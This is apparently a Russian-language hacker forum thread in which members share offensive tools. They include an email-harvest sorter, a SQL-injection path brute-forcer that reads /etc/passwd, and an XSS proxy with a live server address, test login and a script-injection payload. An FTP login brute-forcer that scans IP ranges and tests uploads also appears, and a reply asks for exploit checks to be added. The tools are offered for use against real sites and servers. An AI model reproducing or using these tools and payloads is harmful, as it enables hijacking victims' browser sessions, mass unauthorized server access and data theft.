Тема тестовая. Различные парсеры/чекеры, использование которых другими людьми будет необходимо. Кроссплатформенное ПО с исходным кодом и свободной лицензией приветствуется
(Autoit) Сортирует Email удаляет дубликаты.( на выходе) Создает директорию \mail сортирует по файлам яндекс - yandex.txt и т.д пункт Автомат для распостраненных email: mail.ru yandex.ru gmail.com aol.com yahoo.com пункт Свой email для других сервисов email.(создает mail.txt) Ссылка Добавил *.html. Добавил модуль, теперь может вытаскивать мыло из 'мусора'.
Перборщик путей/скриптов в раскрученной скуле Тулза ищет физические пути до скриптов на *nix серверах, работает с UnionBased. Принимет три параметра: 1. (Обязателен) -u Передать в качестве значения урл вида http://www.vulnerhost.com/index.php?id=3+union+all+select+1,2,3,%POINT%,4,5-- где "%POINT%" точка полезной нагрузки. Значение этого параметра рекомендуется обрамлять в двойные кавычки. 2. (Опционально) -p Указывает кастомный префих путей, пример /пиздец/как/далеко/до/сервера в итоге будут сгенерированиы такие пути: /пиздец/как/далеко/до/сервера/public_html/index.php /пиздец/как/далеко/до/сервера/httpdocs/info.php /пиздец/как/далеко/до/сервера/index.html ... Если не указывать эту опцию, первым будет парсится /etc/passwd. 3. (Опционально) -g Сгенерировать список путей и выйти без дальнейшего брута Во время брута если файл нашелся складывает результат в файл log.log, если нет то просто отображает "%" или "~" если произошла ошибка запроса. Запускать примерно так: c:\jruby-1.7.16.1\bin\jruby.exe bruteforce.rb но думаю что на не джава руби тоже покатит т.к. основные либы совместимы у них Писал на стадии изучения руби, поэтому за кривой код особо не ругать . Ссылка
XSS proxy написанный на php + js (супер сырая недопиленная бета) выкладываю так как пока нет времени на допиливание, насчет быдлокода не пинайте а лучше конструктивно критикуйте с рабочими исправлениями Из плюсов: Минимальные требование (apache + mod_rewrite + php + js) Весит очень мало Прост в использовании Что покачто недопиленно: Динамическая обфускация JS (шоб не палилось антивирусами как beef) Мультисессионность (начал пилить) Очередь запросов POST запросы с multipart-form-data Не тестирвоалась кроссбраузерность В админке у сессий не видно ссылки на которых находится жертва. Тестовая сборка: http://46.101.153.64/admin.php Как юзать? Втыкаем в своем браузере проксю 46.101.153.64:80 (логин и пароль test:test) Атакуем когонить с XSS пейлоадом <script src="http://46.101.153.64/xss.php"></script> обновляем admin.php пока в нем не появится сессия, далее пытаемся открыть сайт на котором находится жертва. Сорцы зааплоажу когда заработает аплоад файлов(
Вот альтернатива сортировки мыл (https://forum.antichat.ru/threads/368725/#post-3395542) Добавляем email которые хотим собрать при выделении чекбокса каждый сервис майл в отдельный файл. Ссылка
Переделал программку. Чекает ФТП: по диапазону ip (xx.xx.xx.xx-xx.xx.xx.xx) или берем готовые ip из файла. Логин пароль можно выбрать свои. Добавил проверку заливки файла. Добавляем: из списка теста или из файла ошибки вроде исправил. Замечания, предложения учту. Ссылка.
скачал програмку из любопытства. на первый взгляд - понравилась. но нельзя-ли немного уточнить некоторый вопросы? 1.как я понял, auth говорит о том, что авторизация прошла успешно? 2.не совсем понятно во вкладке test upload пункт фтп спискок->вставить. пытался вставлять различными способами и ничего не происходит. список из фтп скана не вставляется в данный пункт?не могли-бы разъяснить основные принципы работы с программой или дать ссылку на ранние пояснения? по поиску не нашел. 3.если вы будете дорабатывать программу, нельзя-ли сделать расширяемый интерфейс? а то на нетбуке, к примеру не совсем удобно. окно не сжимается и не удобно немного пользоваться ею...
auth - если пара логин/пароль установленные в программе не подходят. Good - Удачная авторизация. Во вкладке test upload пункт фтп спискок и из файла выводится количество Good внизу в статус баре Всего:.(на экран выводятся только удачные заливки и пути) В ближайшее время доработаю
во-блин...а я-то думал,что тема умерла,а автор забросил проект... чисто случайно зашел. теперь буду почаще наведываться... спасибо за ответ. программа действительно понравилась. главное - не пропустить обновление,если вы еще ее не забросили. вопрос-не планируете включить в программу пробивку по эксплойтам,кроме простого брута по паролям? и еще один вопрос - новая версия программы еще не вышла?